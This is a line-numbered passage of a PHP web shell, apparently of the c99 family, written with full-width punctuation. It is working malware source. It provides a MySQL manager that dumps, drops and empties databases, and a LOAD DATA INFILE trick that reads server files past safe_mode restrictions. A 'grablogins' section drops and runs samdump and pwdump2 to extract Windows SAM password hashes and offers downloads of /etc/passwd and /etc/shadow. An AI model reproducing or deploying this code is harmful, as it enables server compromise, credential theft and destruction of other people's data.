1543. echo "＜b＞Only tables （explode \";\"） ＜b＞＜sup＞1＜/sup＞＜/b＞:＜/b＞ ＜input type＝\"text\" name＝\"dmptbls\" value＝\"".htmlspecialchars（$v）."\" size＝\"".（strlen（$v）+5）."\"＞＜br＞＜br＞";
1544. if （$dump_file） {$tmp ＝ $dump_file;}
1545. else {$tmp ＝ htmlspecialchars（"./dump_".getenv（"SERVER_NAME"）."_".$sql_db."_".date（"d-m-Y-H-i-s"）.".sql"）;}
1546. echo "＜b＞File:＜/b＞ ＜input type＝\"text\" name＝\"sql_dump_file\" value＝\"".$tmp."\" size＝\"".（strlen（$tmp）+strlen（$tmp） % 30）."\"＞＜br＞＜br＞";
1547. echo "＜b＞Download: ＜/b＞ ＜input type＝\"checkbox\" name＝\"sql_dump_download\" value＝\"1\" checked＞＜br＞＜br＞";
1548. echo "＜b＞Save to file: ＜/b＞ ＜input type＝\"checkbox\" name＝\"sql_dump_savetofile\" value＝\"1\" checked＞";
1549. echo "＜br＞＜br＞＜input type＝\"submit\" name＝\"submit\" value＝\"Dump\"＞＜br＞＜br＞＜b＞＜sup＞1＜/sup＞＜/b＞ - all, if empty";
1550. echo "＜/form＞";
1551. }
1552. else
1553. {
1554. $diplay ＝ TRUE;
1555. $set ＝ array（）;
1556. $set["sock"] ＝ $sql_sock;
1557. $set["db"] ＝ $sql_db;
1558. $dump_out ＝ "download";
1559. $set["print"] ＝ 0;
1560. $set["nl2br"] ＝ 0;
1561. $set[""] ＝ 0;
1562. $set["file"] ＝ $dump_file;
1563. $set["add_drop"] ＝ TRUE;
1564. $set["onlytabs"] ＝ array（）;
1565. if （!empty（$dmptbls）） {$set["onlytabs"] ＝ explode（";",$dmptbls）;}
1566. $ret ＝ mysql_dump（$set）;
1567. if （$sql_dump_download）
1568. {
1569. @ob_clean（）;
1570. header（"Content-type: application/octet-stream"）;
1571. header（"Content-length: ".strlen（$ret））;
1572. header（"Content-disposition: attachment; filename＝\"".basename（$sql_dump_file）."\";"）;
1573. echo $ret;
1574. exit;
1575. }
1576. elseif （$sql_dump_savetofile）
1577. {
1578. $fp ＝ fopen（$sql_dump_file,"w"）;
1579. if （!$fp） {echo "＜b＞Dump error! Can't write to \"".htmlspecialchars（$sql_dump_file）."\"!";}
1580. else
1581. {
1582. fwrite（$fp,$ret）;
1583. fclose（$fp）;
1584. echo "＜b＞Dumped! Dump has been writed to \"".htmlspecialchars（realpath（$sql_dump_file））."\" （".view_size（filesize（$sql_dump_file））."）＜/b＞.";
1585. }
1586. }
1587. else {echo "＜b＞Dump: nothing to do!＜/b＞";}
1588. }
1589. }
1590. if （$diplay）
1591. {
1592. if （!empty（$sql_tbl））
1593. {
1594. if （empty（$sql_tbl_act）） {$sql_tbl_act ＝ "browse";}
1595. $count ＝ mysql_query（"SELECT COUNT（*） FROM `".$sql_tbl."`;"）;
1596. $count_row ＝ mysql_fetch_array（$count）;
1597. mysql_free_result（$count）;
1598. $tbl_struct_result ＝ mysql_query（"SHOW FIELDS FROM `".$sql_tbl."`;"）;
1599. $tbl_struct_fields ＝ array（）;
1600. while （$row ＝ mysql_fetch_assoc（$tbl_struct_result）） {$tbl_struct_fields[] ＝ $row;}
1601. if （$sql_ls ＞ $sql_le） {$sql_le ＝ $sql_ls + $perpage;}
1602. if （empty（$sql_tbl_page）） {$sql_tbl_page ＝ 0;}
1603. if （empty（$sql_tbl_ls）） {$sql_tbl_ls ＝ 0;}
1604. if （empty（$sql_tbl_le）） {$sql_tbl_le ＝ 30;}
1605. $perpage ＝ $sql_tbl_le - $sql_tbl_ls;
1606. if （!is_numeric（$perpage）） {$perpage ＝ 10;}
1607. $numpages ＝ $count_row[0]/$perpage;
1608. $e ＝ explode（" ",$sql_order）;
1609. if （count（$e） ＝＝ 2）
1610. {
1611. if （$e[0] ＝＝ "d"） {$asc_desc ＝ "DESC";}
1612. else {$asc_desc ＝ "ASC";}
1613. $v ＝ "ORDER BY `".$e[1]."` ".$asc_desc." ";
1614. }
1615. else {$v ＝ "";}
1616. $query ＝ "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1617. $result ＝ mysql_query（$query） or print（mysql_smarterror（））;
1618. echo "＜hr size＝\"1\" noshade＞＜center＞＜b＞Table ".htmlspecialchars（$sql_tbl）." （".mysql_num_fields（$result）." cols and ".$count_row[0]." rows）＜/b＞＜/center＞";
1619. echo "＜a href＝\"".$sql_surl."sql_tbl＝".urlencode（$sql_tbl）."&sql_tbl_act＝structure\"＞[ ＜b＞Structure＜/b＞ ]＜/a＞   ";
1620. echo "＜a href＝\"".$sql_surl."sql_tbl＝".urlencode（$sql_tbl）."&sql_tbl_act＝browse\"＞[ ＜b＞Browse＜/b＞ ]＜/a＞   ";
1621. echo "＜a href＝\"".$sql_surl."sql_tbl＝".urlencode（$sql_tbl）."&sql_act＝tbldump&thistbl＝1\"＞[ ＜b＞Dump＜/b＞ ]＜/a＞   ";
1622. echo "＜a href＝\"".$sql_surl."sql_tbl＝".urlencode（$sql_tbl）."&sql_tbl_act＝insert\"＞[ ＜b＞Insert＜/b＞ ]＜/a＞   ";
1623. if （$sql_tbl_act ＝＝ "structure"） {echo "＜br＞＜br＞＜b＞Coming sooon!＜/b＞";}
1624. if （$sql_tbl_act ＝＝ "insert"）
1625. {
1626. if （!is_array（$sql_tbl_insert）） {$sql_tbl_insert ＝ array（）;}
1627. if （!empty（$sql_tbl_insert_radio））
1628. {
1629.  
1630. }
1631. else
1632. {
1633. echo "＜br＞＜br＞＜b＞Inserting row into table:＜/b＞＜br＞";
1634. if （!empty（$sql_tbl_insert_q））
1635. {
1636. $sql_query ＝ "SELECT * FROM `".$sql_tbl."`";
1637. $sql_query .＝ " WHERE".$sql_tbl_insert_q;
1638. $sql_query .＝ " LIMIT 1;";
1639. $result ＝ mysql_query（$sql_query,$sql_sock） or print（"＜br＞＜br＞".mysql_smarterror（））;
1640. $values ＝ mysql_fetch_assoc（$result）;
1641. mysql_free_result（$result）;
1642. }
1643. else {$values ＝ array（）;}
1644. echo "＜form method＝\"POST\"＞＜TABLE cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"1%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞＜tr＞＜td＞＜b＞Field＜/b＞＜/td＞＜td＞＜b＞Type＜/b＞＜/td＞＜td＞＜b＞Function＜/b＞＜/td＞＜td＞＜b＞Value＜/b＞＜/td＞＜/tr＞";
1645. foreach （$tbl_struct_fields as $field）
1646. {
1647. $name ＝ $field["Field"];
1648. if （empty（$sql_tbl_insert_q）） {$v ＝ "";}
1649. echo "＜tr＞＜td＞＜b＞".htmlspecialchars（$name）."＜/b＞＜/td＞＜td＞".$field["Type"]."＜/td＞＜td＞＜select name＝\"sql_tbl_insert_functs[".htmlspecialchars（$name）."]\"＞＜option value＝\"\"＞＜/option＞＜option＞PASSWORD＜/option＞＜option＞MD5＜/option＞＜option＞ENCRYPT＜/option＞＜option＞ASCII＜/option＞＜option＞CHAR＜/option＞＜option＞RAND＜/option＞＜option＞LAST_INSERT_ID＜/option＞＜option＞COUNT＜/option＞＜option＞AVG＜/option＞＜option＞SUM＜/option＞＜option value＝\"\"＞--------＜/option＞＜option＞SOUNDEX＜/option＞＜option＞LCASE＜/option＞＜option＞UCASE＜/option＞＜option＞NOW＜/option＞＜option＞CURDATE＜/option＞＜option＞CURTIME＜/option＞＜option＞FROM_DAYS＜/option＞＜option＞FROM_UNIXTIME＜/option＞＜option＞PERIOD_ADD＜/option＞＜option＞PERIOD_DIFF＜/option＞＜option＞TO_DAYS＜/option＞＜option＞UNIX_TIMESTAMP＜/option＞＜option＞USER＜/option＞＜option＞WEEKDAY＜/option＞＜option＞CONCAT＜/option＞＜/select＞＜/td＞＜td＞＜input type＝\"text\" name＝\"sql_tbl_insert[".htmlspecialchars（$name）."]\" value＝\"".htmlspecialchars（$values[$name]）."\" size＝50＞＜/td＞＜/tr＞";
1650. $i++;
1651. }
1652. echo "＜/table＞＜br＞";
1653. echo "＜input type＝\"radio\" name＝\"sql_tbl_insert_radio\" value＝\"1\""; if （empty（$sql_tbl_insert_q）） {echo " checked";} echo "＞＜b＞Insert as new row＜/b＞";
1654. if （!empty（$sql_tbl_insert_q）） {echo " or ＜input type＝\"radio\" name＝\"sql_tbl_insert_radio\" value＝\"2\" checked＞＜b＞Save＜/b＞"; echo "＜input type＝\"hidden\" name＝\"sql_tbl_insert_q\" value＝\"".htmlspecialchars（$sql_tbl_insert_q）."\"＞";}
1655. echo "＜br＞＜br＞＜input type＝\"submit\" value＝\"Confirm\"＞＜/form＞";
1656. }
1657. }
1658. if （$sql_tbl_act ＝＝ "browse"）
1659. {
1660. $sql_tbl_ls ＝ abs（$sql_tbl_ls）;
1661. $sql_tbl_le ＝ abs（$sql_tbl_le）;
1662. echo "＜hr size＝\"1\" noshade＞";
1663. echo "＜img src＝\"".$surl."act＝img&img＝multipage\" height＝\"12\" width＝\"10\" alt＝\"Pages\"＞ ";
1664. $b ＝ 0;
1665. for（$i＝0;$i＜$numpages;$i++）
1666. {
1667. if （（$i*$perpage !＝ $sql_tbl_ls） or （$i*$perpage+$perpage !＝ $sql_tbl_le）） {echo "＜a href＝\"".$sql_surl."sql_tbl＝".urlencode（$sql_tbl）."&sql_order＝".htmlspecialchars（$sql_order）."&sql_tbl_ls＝".（$i*$perpage）."&sql_tbl_le＝".（$i*$perpage+$perpage）."\"＞＜u＞";}
1668. echo $i;
1669. if （（$i*$perpage !＝ $sql_tbl_ls） or （$i*$perpage+$perpage !＝ $sql_tbl_le）） {echo "＜/u＞＜/a＞";}
1670. if （（$i/30 ＝＝ round（$i/30）） and （$i ＞ 0）） {echo "＜br＞";}
1671. else {echo " ";}
1672. }
1673. if （$i ＝＝ 0） {echo "empty";}
1674. echo "＜form method＝\"GET\"＞＜input type＝\"hidden\" name＝\"act\" value＝\"sql\"＞＜input type＝\"hidden\" name＝\"sql_db\" value＝\"".htmlspecialchars（$sql_db）."\"＞＜input type＝\"hidden\" name＝\"sql_login\" value＝\"".htmlspecialchars（$sql_login）."\"＞＜input type＝\"hidden\" name＝\"sql_passwd\" value＝\"".htmlspecialchars（$sql_passwd）."\"＞＜input type＝\"hidden\" name＝\"sql_server\" value＝\"".htmlspecialchars（$sql_server）."\"＞＜input type＝\"hidden\" name＝\"sql_port\" value＝\"".htmlspecialchars（$sql_port）."\"＞＜input type＝\"hidden\" name＝\"sql_tbl\" value＝\"".htmlspecialchars（$sql_tbl）."\"＞＜input type＝\"hidden\" name＝\"sql_order\" value＝\"".htmlspecialchars（$sql_order）."\"＞＜b＞From:＜/b＞ ＜input type＝\"text\" name＝\"sql_tbl_ls\" value＝\"".$sql_tbl_ls."\"＞ ＜b＞To:＜/b＞ ＜input type＝\"text\" name＝\"sql_tbl_le\" value＝\"".$sql_tbl_le."\"＞ ＜input type＝\"submit\" value＝\"View\"＞＜/form＞";
1675. echo "＜br＞＜form method＝\"POST\"＞＜TABLE cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"1%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞";
1676. echo "＜tr＞";
1677. echo "＜td＞＜input type＝\"checkbox\" name＝\"boxrow_all\" value＝\"1\"＞＜/td＞";
1678. for （$i＝0;$i＜mysql_num_fields（$result）;$i++）
1679. {
1680. $v ＝ mysql_field_name（$result,$i）;
1681. if （$e[0] ＝＝ "a"） {$s ＝ "d"; $m ＝ "asc";}
1682. else {$s ＝ "a"; $m ＝ "desc";}
1683. echo "＜td＞";
1684. if （empty（$e[0]）） {$e[0] ＝ "a";}
1685. if （$e[1] !＝ $v） {echo "＜a href＝\"".$sql_surl."sql_tbl＝".$sql_tbl."&sql_tbl_le＝".$sql_tbl_le."&sql_tbl_ls＝".$sql_tbl_ls."&sql_order＝".$e[0]."%20".$v."\"＞＜b＞".$v."＜/b＞＜/a＞";}
1686. else {echo "＜b＞".$v."＜/b＞＜a href＝\"".$sql_surl."sql_tbl＝".$sql_tbl."&sql_tbl_le＝".$sql_tbl_le."&sql_tbl_ls＝".$sql_tbl_ls."&sql_order＝".$s."%20".$v."\"＞＜img src＝\"".$surl."act＝img&img＝sort_".$m."\" height＝\"9\" width＝\"14\" alt＝\"".$m."\"＞＜/a＞";}
1687. echo "＜/td＞";
1688. }
1689. echo "＜td＞＜font color＝\"green\"＞＜b＞Action＜/b＞＜/font＞＜/td＞";
1690. echo "＜/tr＞";
1691. while （$row ＝ mysql_fetch_array（$result, MYSQL_ASSOC））
1692. {
1693. echo "＜tr＞";
1694. $w ＝ "";
1695. $i ＝ 0;
1696. foreach （$row as $k＝＞$v） {$name ＝ mysql_field_name（$result,$i）; $w .＝ " `".$name."` ＝ '".addslashes（$v）."' AND"; $i++;}
1697. if （count（$row） ＞ 0） {$w ＝ substr（$w,0,strlen（$w）-3）;}
1698. echo "＜td＞＜input type＝\"checkbox\" name＝\"boxrow[]\" value＝\"".$w."\"＞＜/td＞";
1699. $i ＝ 0;
1700. foreach （$row as $k＝＞$v）
1701. {
1702. $v ＝ htmlspecialchars（$v）;
1703. if （$v ＝＝ ""） {$v ＝ "＜font color＝\"green\"＞NULL＜/font＞";}
1704. echo "＜td＞".$v."＜/td＞";
1705. $i++;
1706. }
1707. echo "＜td＞";
1708. echo "＜a href＝\"".$sql_surl."sql_act＝query&sql_tbl＝".urlencode（$sql_tbl）."&sql_tbl_ls＝".$sql_tbl_ls."&sql_tbl_le＝".$sql_tbl_le."&sql_query＝".urlencode（"DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;"）."\"＞＜img src＝\"".$surl."act＝img&img＝sql_button_drop\" alt＝\"Delete\" height＝\"13\" width＝\"11\" border＝\"0\"＞＜/a＞ ";
1709. echo "＜a href＝\"".$sql_surl."sql_tbl_act＝insert&sql_tbl＝".urlencode（$sql_tbl）."&sql_tbl_ls＝".$sql_tbl_ls."&sql_tbl_le＝".$sql_tbl_le."&sql_tbl_insert_q＝".urlencode（$w）."\"＞＜img src＝\"".$surl."act＝img&img＝change\" alt＝\"Edit\" height＝\"14\" width＝\"14\" border＝\"0\"＞＜/a＞ ";
1710. echo "＜/td＞";
1711. echo "＜/tr＞";
1712. }
1713. mysql_free_result（$result）;
1714. echo "＜/table＞＜hr size＝\"1\" noshade＞＜p align＝\"left\"＞＜img src＝\"".$surl."act＝img&img＝arrow_ltr\" border＝\"0\"＞＜select name＝\"sql_act\"＞";
1715. echo "＜option value＝\"\"＞With selected:＜/option＞";
1716. echo "＜option value＝\"deleterow\"＞Delete＜/option＞";
1717. echo "＜/select＞ ＜input type＝\"submit\" value＝\"Confirm\"＞＜/form＞＜/p＞";
1718. }
1719. }
1720. else
1721. {
1722. $result ＝ mysql_query（"SHOW TABLE STATUS", $sql_sock）;
1723. if （!$result） {echo mysql_smarterror（）;}
1724. else
1725. {
1726. echo "＜br＞＜form method＝\"POST\"＞＜TABLE cellSpacing＝0 borderColorDark＝#666666 cellPadding＝5 width＝\"100%\" bgcolor＝#000000 borderColorLight＝#c0c0c0 border＝1＞＜tr＞＜td＞＜input type＝\"checkbox\" name＝\"boxtbl_all\" value＝\"1\"＞＜/td＞＜td＞＜center＞＜b＞Table＜/b＞＜/center＞＜/td＞＜td＞＜b＞Rows＜/b＞＜/td＞＜td＞＜b＞Type＜/b＞＜/td＞＜td＞＜b＞Created＜/b＞＜/td＞＜td＞＜b＞Modified＜/b＞＜/td＞＜td＞＜b＞Size＜/b＞＜/td＞＜td＞＜b＞Action＜/b＞＜/td＞＜/tr＞";
1727. $i ＝ 0;
1728. $tsize ＝ $trows ＝ 0;
1729. while （$row ＝ mysql_fetch_array（$result, MYSQL_ASSOC））
1730. {
1731. $tsize +＝ $row["Data_length"];
1732. $trows +＝ $row["Rows"];
1733. $size ＝ view_size（$row["Data_length"]）;
1734. echo "＜tr＞";
1735. echo "＜td＞＜input type＝\"checkbox\" name＝\"boxtbl[]\" value＝\"".$row["Name"]."\"＞＜/td＞";
1736. echo "＜td＞ ＜a href＝\"".$sql_surl."sql_tbl＝".urlencode（$row["Name"]）."\"＞＜b＞".$row["Name"]."＜/b＞＜/a＞ ＜/td＞";
1737. echo "＜td＞".$row["Rows"]."＜/td＞";
1738. echo "＜td＞".$row["Type"]."＜/td＞";
1739. echo "＜td＞".$row["Create_time"]."＜/td＞";
1740. echo "＜td＞".$row["Update_time"]."＜/td＞";
1741. echo "＜td＞".$size."＜/td＞";
1742. echo "＜td＞ ＜a href＝\"".$sql_surl."sql_act＝query&sql_query＝".urlencode（"DELETE FROM `".$row["Name"]."`"）."\"＞＜img src＝\"".$surl."act＝img&img＝sql_button_empty\" alt＝\"Empty\" height＝\"13\" width＝\"11\" border＝\"0\"＞＜/a＞  ＜a href＝\"".$sql_surl."sql_act＝query&sql_query＝".urlencode（"DROP TABLE `".$row["Name"]."`"）."\"＞＜img src＝\"".$surl."act＝img&img＝sql_button_drop\" alt＝\"Drop\" height＝\"13\" width＝\"11\" border＝\"0\"＞＜/a＞ ＜a href＝\"".$sql_surl."sql_tbl_act＝insert&sql_tbl＝".$row["Name"]."\"＞＜img src＝\"".$surl."act＝img&img＝sql_button_insert\" alt＝\"Insert\" height＝\"13\" width＝\"11\" border＝\"0\"＞＜/a＞ ＜/td＞";
1743. echo "＜/tr＞";
1744. $i++;
1745. }
1746. echo "＜tr bgcolor＝\"000000\"＞";
1747. echo "＜td＞＜center＞＜b＞+＜/b＞＜/center＞＜/td＞";
1748. echo "＜td＞＜center＞＜b＞".$i." table（s）＜/b＞＜/center＞＜/td＞";
1749. echo "＜td＞＜b＞".$trows."＜/b＞＜/td＞";
1750. echo "＜td＞".$row[1]."＜/td＞";
1751. echo "＜td＞".$row[10]."＜/td＞";
1752. echo "＜td＞".$row[11]."＜/td＞";
1753. echo "＜td＞＜b＞".view_size（$tsize）."＜/b＞＜/td＞";
1754. echo "＜td＞＜/td＞";
1755. echo "＜/tr＞";
1756. echo "＜/table＞＜hr size＝\"1\" noshade＞＜p align＝\"right\"＞＜img src＝\"".$surl."act＝img&img＝arrow_ltr\" border＝\"0\"＞＜select name＝\"sql_act\"＞";
1757. echo "＜option value＝\"\"＞With selected:＜/option＞";
1758. echo "＜option value＝\"tbldrop\"＞Drop＜/option＞";
1759. echo "＜option value＝\"tblempty\"＞Empty＜/option＞";
1760. echo "＜option value＝\"tbldump\"＞Dump＜/option＞";
1761. echo "＜option value＝\"tblcheck\"＞Check table＜/option＞";
1762. echo "＜option value＝\"tbloptimize\"＞Optimize table＜/option＞";
1763. echo "＜option value＝\"tblrepair\"＞Repair table＜/option＞";
1764. echo "＜option value＝\"tblanalyze\"＞Analyze table＜/option＞";
1765. echo "＜/select＞ ＜input type＝\"submit\" value＝\"Confirm\"＞＜/form＞＜/p＞";
1766. mysql_free_result（$result）;
1767. }
1768. }
1769. }
1770. }
1771. }
1772. else
1773. {
1774. $acts ＝ array（"","newdb","serverstatus","servervars","processes","getfile"）;
1775. if （in_array（$sql_act,$acts）） {?＞＜table border＝"0" width＝"100%" height＝"1"＞＜tr＞＜td width＝"30%" height＝"1"＞＜b＞Create new DB:＜/b＞＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝"hidden" name＝"act" value＝"sql"＞＜input type＝"hidden" name＝"sql_act" value＝"newdb"＞＜input type＝"hidden" name＝"sql_login" value＝"＜?php echo htmlspecialchars（$sql_login）; ?＞"＞＜input type＝"hidden" name＝"sql_passwd" value＝"＜?php echo htmlspecialchars（$sql_passwd）; ?＞"＞＜input type＝"hidden" name＝"sql_server" value＝"＜?php echo htmlspecialchars（$sql_server）; ?＞"＞＜input type＝"hidden" name＝"sql_port" value＝"＜?php echo htmlspecialchars（$sql_port）; ?＞"＞＜input type＝"text" name＝"sql_newdb" size＝"20"＞ ＜input type＝"submit" value＝"Create"＞＜/form＞＜/td＞＜td width＝"30%" height＝"1"＞＜b＞View File:＜/b＞＜form action＝"＜?php echo $surl; ?＞"＞＜input type＝"hidden" name＝"act" value＝"sql"＞＜input type＝"hidden" name＝"sql_act" value＝"getfile"＞＜input type＝"hidden" name＝"sql_login" value＝"＜?php echo htmlspecialchars（$sql_login）; ?＞"＞＜input type＝"hidden" name＝"sql_passwd" value＝"＜?php echo htmlspecialchars（$sql_passwd）; ?＞"＞＜input type＝"hidden" name＝"sql_server" value＝"＜?php echo htmlspecialchars（$sql_server）; ?＞"＞＜input type＝"hidden" name＝"sql_port" value＝"＜?php echo htmlspecialchars（$sql_port）; ?＞"＞＜input type＝"text" name＝"sql_getfile" size＝"30" value＝"＜?php echo htmlspecialchars（$sql_getfile）; ?＞"＞ ＜input type＝"submit" value＝"Get"＞＜/form＞＜/td＞＜td width＝"30%" height＝"1"＞＜/td＞＜/tr＞＜tr＞＜td width＝"30%" height＝"1"＞＜/td＞＜td width＝"30%" height＝"1"＞＜/td＞＜td width＝"30%" height＝"1"＞＜/td＞＜/tr＞＜/table＞＜?php }
1776. if （!empty（$sql_act））
1777. {
1778. echo "＜hr size＝\"1\" noshade＞";
1779. if （$sql_act ＝＝ "newdb"）
1780. {
1781. echo "＜b＞";
1782. if （（mysql_create_db （$sql_newdb）） and （!empty（$sql_newdb））） {echo "DB \"".htmlspecialchars（$sql_newdb）."\" has been created with success!＜/b＞＜br＞";}
1783. else {echo "Can't create DB \"".htmlspecialchars（$sql_newdb）."\".＜br＞Reason:＜/b＞ ".mysql_smarterror（）;}
1784. }
1785. if （$sql_act ＝＝ "serverstatus"）
1786. {
1787. $result ＝ mysql_query（"SHOW STATUS", $sql_sock）;
1788. echo "＜center＞＜b＞Server-status variables:＜/b＞＜br＞＜br＞";
1789. echo "＜TABLE cellSpacing＝0 cellPadding＝0 bgcolor＝#000000 borderColorLight＝#333333 border＝1＞＜td＞＜b＞Name＜/b＞＜/td＞＜td＞＜b＞Value＜/b＞＜/td＞＜/tr＞";
1790. while （$row ＝ mysql_fetch_array（$result, MYSQL_NUM）） {echo "＜tr＞＜td＞".$row[0]."＜/td＞＜td＞".$row[1]."＜/td＞＜/tr＞";}
1791. echo "＜/table＞＜/center＞";
1792. mysql_free_result（$result）;
1793. }
1794. if （$sql_act ＝＝ "servervars"）
1795. {
1796. $result ＝ mysql_query（"SHOW VARIABLES", $sql_sock）;
1797. echo "＜center＞＜b＞Server variables:＜/b＞＜br＞＜br＞";
1798. echo "＜TABLE cellSpacing＝0 cellPadding＝0 bgcolor＝#000000 borderColorLight＝#333333 border＝1＞＜td＞＜b＞Name＜/b＞＜/td＞＜td＞＜b＞Value＜/b＞＜/td＞＜/tr＞";
1799. while （$row ＝ mysql_fetch_array（$result, MYSQL_NUM）） {echo "＜tr＞＜td＞".$row[0]."＜/td＞＜td＞".$row[1]."＜/td＞＜/tr＞";}
1800. echo "＜/table＞";
1801. mysql_free_result（$result）;
1802. }
1803. if （$sql_act ＝＝ "processes"）
1804. {
1805. if （!empty（$kill）） {$query ＝ "KILL ".$kill.";"; $result ＝ mysql_query（$query, $sql_sock）; echo "＜b＞Killing process #".$kill."... ok. he is dead, amen.＜/b＞";}
1806. $result ＝ mysql_query（"SHOW PROCESSLIST", $sql_sock）;
1807. echo "＜center＞＜b＞Processes:＜/b＞＜br＞＜br＞";
1808. echo "＜TABLE cellSpacing＝0 cellPadding＝2 bgcolor＝#000000 borderColorLight＝#333333 border＝1＞＜td＞＜b＞ID＜/b＞＜/td＞＜td＞＜b＞USER＜/b＞＜/td＞＜td＞＜b＞HOST＜/b＞＜/td＞＜td＞＜b＞DB＜/b＞＜/td＞＜td＞＜b＞COMMAND＜/b＞＜/td＞＜td＞＜b＞TIME＜/b＞＜/td＞＜td＞＜b＞STATE＜/b＞＜/td＞＜td＞＜b＞INFO＜/b＞＜/td＞＜td＞＜b＞Action＜/b＞＜/td＞＜/tr＞";
1809. while （$row ＝ mysql_fetch_array（$result, MYSQL_NUM）） { echo "＜tr＞＜td＞".$row[0]."＜/td＞＜td＞".$row[1]."＜/td＞＜td＞".$row[2]."＜/td＞＜td＞".$row[3]."＜/td＞＜td＞".$row[4]."＜/td＞＜td＞".$row[5]."＜/td＞＜td＞".$row[6]."＜/td＞＜td＞".$row[7]."＜/td＞＜td＞＜a href＝\"".$sql_surl."sql_act＝processes&kill＝".$row[0]."\"＞＜u＞Kill＜/u＞＜/a＞＜/td＞＜/tr＞";}
1810. echo "＜/table＞";
1811. mysql_free_result（$result）;
1812. }
1813. if （$sql_act ＝＝ "getfile"）
1814. {
1815. $tmpdb ＝ $sql_login."_tmpdb";
1816. $select ＝ mysql_select_db（$tmpdb）;
1817. if （!$select） {mysql_create_db（$tmpdb）; $select ＝ mysql_select_db（$tmpdb）; $created ＝ !!$select;}
1818. if （$select）
1819. {
1820. $created ＝ FALSE;
1821. mysql_query（"CREATE TABLE `tmp_file` （ `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL ）;"）;
1822. mysql_query（"LOAD DATA INFILE \"".addslashes（$sql_getfile）."\" INTO TABLE tmp_file"）;
1823. $result ＝ mysql_query（"SELECT * FROM tmp_file;"）;
1824. if （!$result） {echo "＜b＞Error in reading file （permision denied）!＜/b＞";}
1825. else
1826. {
1827. for （$i＝0;$i＜mysql_num_fields（$result）;$i++） {$name ＝ mysql_field_name（$result,$i）;}
1828. $f ＝ "";
1829. while （$row ＝ mysql_fetch_array（$result, MYSQL_ASSOC）） {$f .＝ join （"\r\n",$row）;}
1830. if （empty（$f）） {echo "＜b＞File \"".$sql_getfile."\" does not exists or empty!＜/b＞＜br＞";}
1831. else {echo "＜b＞File \"".$sql_getfile."\":＜/b＞＜br＞".nl2br（htmlspecialchars（$f））."＜br＞";}
1832. mysql_free_result（$result）;
1833. mysql_query（"DROP TABLE tmp_file;"）;
1834. }
1835. }
1836. mysql_drop_db（$tmpdb）; //comment it if you want to leave database
1837. }
1838. }
1839. }
1840. }
1841. echo "＜/td＞＜/tr＞＜/table＞";
1842. if （$sql_sock）
1843. {
1844. $affected ＝ @mysql_affected_rows（$sql_sock）;
1845. if （（!is_numeric（$affected）） or （$affected ＜ 0））{$affected ＝ 0;}
1846. echo "＜tr＞＜td＞＜center＞＜b＞Affected rows: ".$affected."＜/center＞＜/td＞＜/tr＞";
1847. }
1848. echo "＜/table＞";
1849. }
1850. if （$act ＝＝ 'grablogins'） {
1851. if （$win） {
1852. echo '＜b＞Grab Windows Logins:＜/b＞＜br＞＜br＞';
1853. if （file_exists（$_SERVER['WINDIR']）） {
1854. echo 'Download backup SAM file: ＜a href＝"'.$surl.'act＝f&f＝sam&ft＝download&d＝'.$_SERVER["WINDIR"].'\repair\"＞＜b＞'.$_SERVER['WINDIR'].'\repair\SAM＜/b＞＜/a＞＜br＞＜br＞';
1855. } else {
1856. echo 'There\'s no backup SAM file!';
1857. }
1858. echo '＜a href＝"'.$surl.'act＝grablogins&dumphashes＝samdump"＞＜b＞Execute SAMDUMP＜/b＞＜/a＞＜br＞＜br＞';
1859. if （$_GET['dumphashes'] ＝＝ 'samdump'） {
1860. if （is_writable（'.'）） {
1861. cf（'samdump.exe', $samdump）;
1862. exec（'samdump.exe '.$_SERVER['WINDIR'].'\repair\sam', $blah）;
1863. echo '＜textarea cols＝175 rows＝10＞';
1864. foreach （$blah as $samline）
1865. echo htmlentities（$samline）."\n";
1866. echo '＜/textarea＞＜br＞＜br＞';
1867. if （file_exists（'samdump.exe'））
1868. unlink（'samdump.exe'）;
1869. }else{
1870. echo 'Directory Is Not Writable!＜br＞';
1871. }
1872. } // end if samdump was called
1873. echo '＜a href＝"'.$surl.'act＝grablogins&dumphashes＝pwdump2"＞＜b＞Execute PWDUMP2＜/b＞＜/a＞＜br＞＜br＞';
1874. if （$_GET['dumphashes'] ＝＝ 'pwdump2'） {
1875. if （is_writable（'.'）） {
1876. cf（'pwdump2.exe', $pwdump2）;
1877. cf（'samdump.dll', $samdumpdll）;
1878. exec（'pwdump2.exe', $blah）;
1879. echo '＜textarea cols＝175 rows＝10＞';
1880. if （$blah） {
1881. foreach （$blah as $samline）
1882. echo htmlentities（$samline）."\n";
1883. } else {
1884. echo 'Couldn\'t get hashes!';
1885. }
1886. echo '＜/textarea＞＜br＞＜br＞';
1887. if （file_exists（'pwdump2.exe'））
1888. unlink（'pwdump2.exe'）;
1889. if （file_exists（'samdump.dll'））
1890. unlink（'samdump.dll'）;
1891. }else{
1892. echo 'Directory Is Not Writable!＜br＞';
1893. }
1894. } // end if pwdump2 was called
1895.  
1896. } else { // if not windows
1897. echo '＜b＞Grab *nix Logins:＜/b＞＜br＞＜br＞';
1898. if （file_exists（'/etc/passwd'））
1899. echo 'Download passwd: ＜a href＝"'.$surl.'act＝f&f＝passwd&ft＝download&d＝/etc/"＞＜b＞/etc/passwd＜/b＞';
1900. if （file_exists（'/etc/master.passwd'））
1901. echo 'Download master.passwd: ＜a href＝"'.$surl.'act＝f&f＝master.passwd&ft＝download&d＝/etc/"＞＜b＞/etc/master.passwd＜/b＞ ＜- 1% chance you can view this';
1902. if （file_exists（'/etc/shadow'））
1903. echo 'Download shadow: ＜a href＝"'.$surl.'act＝f&f＝shadow&ft＝download&d＝/etc/"＞＜b＞/etc/shadow＜/b＞ ＜- 1% chance you can view this';
1904. }
1905. }
1906. if （$act ＝＝ "mkdir"）
1907. {
1908. if （$mkdir !＝ $d）
1909. {
1910. if （file_exists（$mkdir）） {echo "＜b＞Make Dir \"".htmlspecialchars（$mkdir）."\"＜/b＞: object alredy exists";}
1911. elseif （!mkdir（$mkdir）） {echo "＜b＞Make Dir \"".htmlspecialchars（$mkdir）."\"＜/b＞: access denied";}
1912. echo "＜br＞＜br＞";
1913. }
1914. $act ＝ $dspact ＝ "ls";
1915. }
